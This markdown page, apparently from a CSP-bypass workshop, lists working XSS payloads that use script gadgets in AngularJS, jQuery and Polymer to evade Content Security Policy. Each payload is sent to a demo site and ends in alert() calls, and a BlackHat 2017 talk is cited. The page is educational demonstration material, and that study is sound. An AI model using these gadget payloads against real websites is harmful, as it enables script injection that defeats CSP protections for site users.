# CSP bypass via script gadgets

[Breaking XSS mitigations
via Script Gadgets (BlachHat USA 2017)](https://www.blackhat.com/docs/us-17/thursday/us-17-Lekies-Dont-Trust-The-DOM-Bypassing-XSS-Mitigations-Via-Script-Gadgets.pdf)

![images/4-table.png](images/4-table.png)

1. AngularJS 1.6.1 (chrome)
	- [http://cspws.ga/4-angular-interpolation.php?xss=%3Cdiv%20ng-app%20ng-csp%3E%20%3Cdiv%20ng-focus=%22x=$event;%22%20id=f%20tabindex=0%3Efoo%3C/div%3E%20%3Cdiv%20ng-repeat=%22(key,%20value)%20in%20x.view%22%3E%20%3Cdiv%20ng-if=%22key%20==%20%27window%27%22%3E{{%20[1].reduce(value.alert,%201337);%20}}%3C/div%3E%20%3C/div%3E#f](http://cspws.ga/4-angular-interpolation.php?xss=%3Cdiv%20ng-app%20ng-csp%3E%20%3Cdiv%20ng-focus=%22x=$event;%22%20id=f%20tabindex=0%3Efoo%3C/div%3E%20%3Cdiv%20ng-repeat=%22(key,%20value)%20in%20x.view%22%3E%20%3Cdiv%20ng-if=%22key%20==%20%27window%27%22%3E{{%20[1].reduce(value.alert,%201337);%20}}%3C/div%3E%20%3C/div%3E#f)

2. AngularJS 1.5.11 (Chrome)
	- [https://cspws.ga/4-angular-input.php?xss=%3Cinput%20autofocus%20ng-focus=%22$event.path|orderBy:%27!x?[].constructor.from([x=1337],alert):0%27%22%3E](https://cspws.ga/4-angular-input.php?xss=%3Cinput%20autofocus%20ng-focus=%22$event.path|orderBy:%27!x?[].constructor.from([x=1337],alert):0%27%22%3E)

3. JQuery get
	- [https://cspws.ga/4-jquery-get.php?url=data:text/javascript,%22use%20strict%22%0d%0aalert(document.domain)](https://cspws.ga/4-jquery-get.php?url=data:text/javascript,%22use%20strict%22%0d%0aalert(document.domain))

4. JQuery templates
	- [https://cspws.ga/4-jquery-template.php?xss=${alert.bind(window)(1337)}](https://cspws.ga/4-jquery-template.php?xss=${alert.bind(window)(1337)})

5. Polymer template
	- [http://cspws.ga/4-polymer-template.php?xss=%3Ctemplate%20is=%22dom-repeat%22%20items=%22[[1]]%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C/template%3E](http://cspws.ga/4-polymer-template.php?xss=%3Ctemplate%20is=%22dom-repeat%22%20items=%22[[1]]%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C/template%3E)

More fun:

	- [https://html5sec.org/cspbypass/](https://html5sec.org/cspbypass/)
	- [http://sebastian-lekies.de/csp/bypasses.php](http://sebastian-lekies.de/csp/bypasses.php)
